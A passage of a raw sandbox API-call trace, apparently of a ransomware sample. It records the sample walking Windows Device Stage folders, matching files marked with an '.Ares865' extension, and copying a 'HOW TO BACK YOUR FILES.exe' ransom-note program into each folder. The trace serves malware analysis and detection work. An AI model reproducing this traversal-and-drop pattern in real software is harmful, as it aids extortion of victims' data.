GetLastError () returned 0x0 [0090.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.318] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.318] CloseHandle (hObject=0x120) returned 1 [0090.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.318] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.318] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.319] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.319] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.319] lstrcpyW (in: lpString1=0x2cce476, lpString2="Device" | out: lpString1="Device") returned="Device" [0090.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0090.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0090.319] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0090.319] lstrcpyW (in: lpString1=0x2cce476, lpString2="Task" | out: lpString1="Task") returned="Task" [0090.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f00d8 [0090.319] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.319] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task" [0090.319] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0090.319] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.319] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task") returned 63 [0090.319] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task" [0090.319] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.319] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\task\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.320] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.320] GetLastError () returned 0x0 [0090.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.320] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.320] CloseHandle (hObject=0x120) returned 1 [0090.320] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.320] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.320] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.320] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.320] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.321] lstrcpyW (in: lpString1=0x2cce480, lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0090.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xce) returned 0x2d40a8 [0090.321] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.321] lstrcpyW (in: lpString1=0x2cce480, lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0090.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.321] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xce) returned 0x2d4180 [0090.321] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.321] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0090.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0090.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.321] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 102 [0090.321] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0090.321] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.321] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.322] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.322] GetLastError () returned 0x0 [0090.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.322] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.322] CloseHandle (hObject=0x120) returned 1 [0090.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.322] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66bd5320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66bd5320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.322] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.322] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0090.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xda) returned 0x2f4fc8 [0090.322] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.323] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="folder.ico.Ares865" | out: lpString1="folder.ico.Ares865") returned="folder.ico.Ares865" [0090.323] lstrlenW (lpString="folder.ico.Ares865") returned 18 [0090.323] lstrlenW (lpString="Ares865") returned 7 [0090.323] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.323] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="print_pref.ico.Ares865" | out: lpString1="print_pref.ico.Ares865") returned="print_pref.ico.Ares865" [0090.323] lstrlenW (lpString="print_pref.ico.Ares865") returned 22 [0090.323] lstrlenW (lpString="Ares865") returned 7 [0090.323] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.323] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="print_property.ico.Ares865" | out: lpString1="print_property.ico.Ares865") returned="print_property.ico.Ares865" [0090.323] lstrlenW (lpString="print_property.ico.Ares865") returned 26 [0090.323] lstrlenW (lpString="Ares865") returned 7 [0090.323] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.323] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="print_queue.ico.Ares865" | out: lpString1="print_queue.ico.Ares865") returned="print_queue.ico.Ares865" [0090.323] lstrlenW (lpString="print_queue.ico.Ares865") returned 23 [0090.323] lstrlenW (lpString="Ares865") returned 7 [0090.323] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.323] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="scan_.ico.Ares865" | out: lpString1="scan_.ico.Ares865") returned="scan_.ico.Ares865" [0090.323] lstrlenW (lpString="scan_.ico.Ares865") returned 17 [0090.323] lstrlenW (lpString="Ares865") returned 7 [0090.323] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.323] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="scan_property.ico.Ares865" | out: lpString1="scan_property.ico.Ares865") returned="scan_property.ico.Ares865" [0090.323] lstrlenW (lpString="scan_property.ico.Ares865") returned 25 [0090.323] lstrlenW (lpString="Ares865") returned 7 [0090.323] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.324] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="scan_settings.ico.Ares865" | out: lpString1="scan_settings.ico.Ares865") returned="scan_settings.ico.Ares865" [0090.324] lstrlenW (lpString="scan_settings.ico.Ares865") returned 25 [0090.324] lstrlenW (lpString="Ares865") returned 7 [0090.324] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.324] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="tasks.xml.Ares865" | out: lpString1="tasks.xml.Ares865") returned="tasks.xml.Ares865" [0090.324] lstrlenW (lpString="tasks.xml.Ares865") returned 17 [0090.324] lstrlenW (lpString="Ares865") returned 7 [0090.324] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.324] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0090.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0090.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.324] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 108 [0090.324] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0090.324] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.324] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.325] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.325] GetLastError () returned 0x0 [0090.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.325] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.325] CloseHandle (hObject=0x120) returned 1 [0090.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.325] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.325] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7b2820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.325] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.325] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.325] lstrcpyW (in: lpString1=0x2cce4da, lpString2="resource.xml.Ares865" | out: lpString1="resource.xml.Ares865") returned="resource.xml.Ares865" [0090.325] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0090.325] lstrlenW (lpString="Ares865") returned 7 [0090.325] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.326] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0090.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0090.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.326] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 102 [0090.326] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0090.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.326] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.326] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.327] GetLastError () returned 0x0 [0090.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.327] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.327] CloseHandle (hObject=0x120) returned 1 [0090.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.327] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.327] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66d520e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66d520e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.327] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.327] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.327] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0090.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xda) returned 0x2f4fc8 [0090.327] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.327] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="folder.ico.Ares865" | out: lpString1="folder.ico.Ares865") returned="folder.ico.Ares865" [0090.327] lstrlenW (lpString="folder.ico.Ares865") returned 18 [0090.327] lstrlenW (lpString="Ares865") returned 7 [0090.327] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.327] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="netfol.ico.Ares865" | out: lpString1="netfol.ico.Ares865") returned="netfol.ico.Ares865" [0090.327] lstrlenW (lpString="netfol.ico.Ares865") returned 18 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.328] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="pictures.ico.Ares865" | out: lpString1="pictures.ico.Ares865") returned="pictures.ico.Ares865" [0090.328] lstrlenW (lpString="pictures.ico.Ares865") returned 20 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.328] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="resource.xml.Ares865" | out: lpString1="resource.xml.Ares865") returned="resource.xml.Ares865" [0090.328] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.328] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="ringtones.ico.Ares865" | out: lpString1="ringtones.ico.Ares865") returned="ringtones.ico.Ares865" [0090.328] lstrlenW (lpString="ringtones.ico.Ares865") returned 21 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.328] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="settings.ico.Ares865" | out: lpString1="settings.ico.Ares865") returned="settings.ico.Ares865" [0090.328] lstrlenW (lpString="settings.ico.Ares865") returned 20 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.328] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="sync.ico.Ares865" | out: lpString1="sync.ico.Ares865") returned="sync.ico.Ares865" [0090.328] lstrlenW (lpString="sync.ico.Ares865") returned 16 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.328] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="tasks.xml.Ares865" | out: lpString1="tasks.xml.Ares865") returned="tasks.xml.Ares865" [0090.328] lstrlenW (lpString="tasks.xml.Ares865") returned 17 [0090.328] lstrlenW (lpString="Ares865") returned 7 [0090.329] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.329] lstrcpyW (in: lpString1=0x2cce4ce, lpString2="wmp.ico.Ares865" | out: lpString1="wmp.ico.Ares865") returned="wmp.ico.Ares865" [0090.329] lstrlenW (lpString="wmp.ico.Ares865") returned 15 [0090.329] lstrlenW (lpString="Ares865") returned 7 [0090.329] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.329] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0090.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0090.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.329] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 108 [0090.329] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0090.329] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.329] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application 